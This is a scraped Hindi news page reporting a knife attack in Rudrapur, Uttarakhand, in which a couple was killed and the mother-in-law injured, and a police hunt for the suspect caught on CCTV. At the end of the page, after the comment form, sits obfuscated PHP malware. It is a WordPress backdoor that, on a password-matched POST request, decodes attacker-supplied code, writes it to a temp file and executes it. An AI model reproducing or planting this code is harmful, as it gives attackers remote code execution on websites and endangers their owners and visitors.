Uttarakhand: रुद्रपुर में दंपती की गला रेतकर हत्या व सास घायल, CCTV में कैद हुई वारदात, आरोपित की तलाश में जुटी पुलिस

Uttarakhand Press 04 August 2023: ट्रांजिट कैंप में पति-पत्नी की चाकू से गला काटकर हत्या कर दी गई। शोर होने पर जब सास पहुंची तो हत्यारोपित ने उसके पेट में चाकू से वार कर दिया। जिससे वह गंभीर रूप से घायल हो गई। शोरशराबा होने पर आसपास के लोग एकत्र हुए तो आरोपित फरार हो गया। पुलिस ने घायल को निजी अस्पताल में भर्ती कराया। आसपास लगे सीसीटीवी की जांच में हत्यारोपित दिख गया।

ट्रांजिट कैंप में पति-पत्नी की चाकू से गला काटकर हत्या कर दी गई। शोर होने पर जब सास पहुंची तो हत्यारोपित ने उसके पेट में चाकू से वार कर दिया, जिससे वह गंभीर रूप से घायल हो गई। शोरशराबा होने पर आसपास के लोग एकत्र हुए तो आरोपित फरार हो गया।

पुलिस ने घायल को निजी अस्पताल में भर्ती कराया। आसपास लगे सीसीटीवी की जांच में हत्यारोपित दिख गया। पुलिस और एसओजी की छह टीम उसकी तलाश में जुट गई हैं।

ट्रांजिट कैंप में रहता है दिलीप मंडल का परिवार:
रुद्रपुर के ट्रांजिट कैंप शिवनगर वार्ड नंबर सात में दिलीप मंडल परिवार के साथ रहते हैं। उनकी छोटी बेटी 35 वर्षीय सोनाली की शादी 14 साल पूर्व उत्तर प्रदेश में आजमगढ़ जिले के मुबारकपुर थाना क्षेत्र के नैठी ग्राम निवासी 38 वर्षीय संजय यादव पुत्र जिंगुर यादव के साथ हुई थी। विवाह के बाद संजय ससुराल में ही रह रहा था। उनकी दो संतानों में 14 वर्षीय जय और आठ वर्षीय अन्नू हैं।

संजय और सोनाली सिडकुल की एक कंपनी में काम करते थे। एक माह पहले दिलीप मंडल धान की रोपाई करने के लिए कर्नाटक चले गए थे। घर में दिलीप की पत्नी गौरी मंडल, पुत्री सोनाली, दामाद संजय और उनके दोनों बच्चे ही थे।

राजमिस्त्री राज ने की हत्या
2 अगस्त की रात परिवार के सभी लोगों ने खाना खाया और फिर अपने-अपने कमरे में सोने चले गए। इस दौरान गौरी अपने पोते जय के साथ, संजय पुत्री के साथ व पत्नी सोनाली दूसरे कमरे में सोने चले गई। रात करीब दो बजे दो साल पहले मोहल्ले में ही किराए पर रहने वाला राजमिस्त्री राज उनके घर में घुस गया। वह पहले संजय के कमरे में गया और उसका गला रेतकर हत्या कर दी। यह देख उसकी बेटी रोने लगी। इसके बाद वह सोनाली के कमरे में गया और चाकू से उसकी हाथ की नस व जबड़ा काट दिया।

यही नहीं सोनाली की पीठ पर भी हत्यारोपित ने गहरा वार किया। सोनाली की चीख सुनकर जब मां गौरी मंडल कमरे से बाहर आई तो हत्यारोपित ने उनके पेट में भी चाकू से वार कर दिया, जिससे वह भी लहुलूहान होकर वहीं गिर गई। बच्चों के रोने-चिल्लाने पर हत्यारोपित फरार हो गया। शोर सुन आसपास के लोग घर में पहुंचे तो संजय मृत अवस्था में मिला। जबकि सोनाली और गौरी मंडल घायल पड़े हुए थे।

लोगों ने एंबुलेंस व पुलिस की दी सूचना:
लोगों ने एंबुलेंस के साथ ही पुलिस को सूचना दी। सूचना पर एसपी सिटी मनोज कुमार कत्याल, सीओ सिटी अनुषा बड़ोला टीम के साथ पहुंचे। घायल सोनाली और गौरी को जिला अस्पताल ले गए। जहां डाक्टर ने सोनाली को मृत घोषित कर दिया। गंभीर रूप से घायल गौरी मंडल का निजी अस्पताल में उपचार चल रहा है।

सीसीटीवी में कैद वारदात:
पुलिस ने घटनास्थल के आसपास लगे सीसीटीवी देखे, जिसमें राजमिस्त्री राज हाथ में चाकू लेकर भागते हुए कैद मिला है। एसएसपी डा.मंजूनाथ टीसी ने बताया कि फुटेज में कैद हत्यारोपित की तलाश की जा रही है। इसके लिए पुलिस और एसओजी की छह टीम लगाई गई है। सर्विलांस की भी मदद ली जा रही है।

Read Previous

बदरीनाथ धाम में अलकनंदा नदी पर निर्माणाधीन बेली ब्रिज टूटने से दो श्रमिक बहे, एक लापता, जांच के निर्देश

Read Next

Gyanvapi Case: सर्वे से इन बातों का होगा खुलासा, सामने आएगी विवादित स्थल की वास्तविकता, इन बिंदुओं पर देनी है सर्वे रिपोर्ट

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}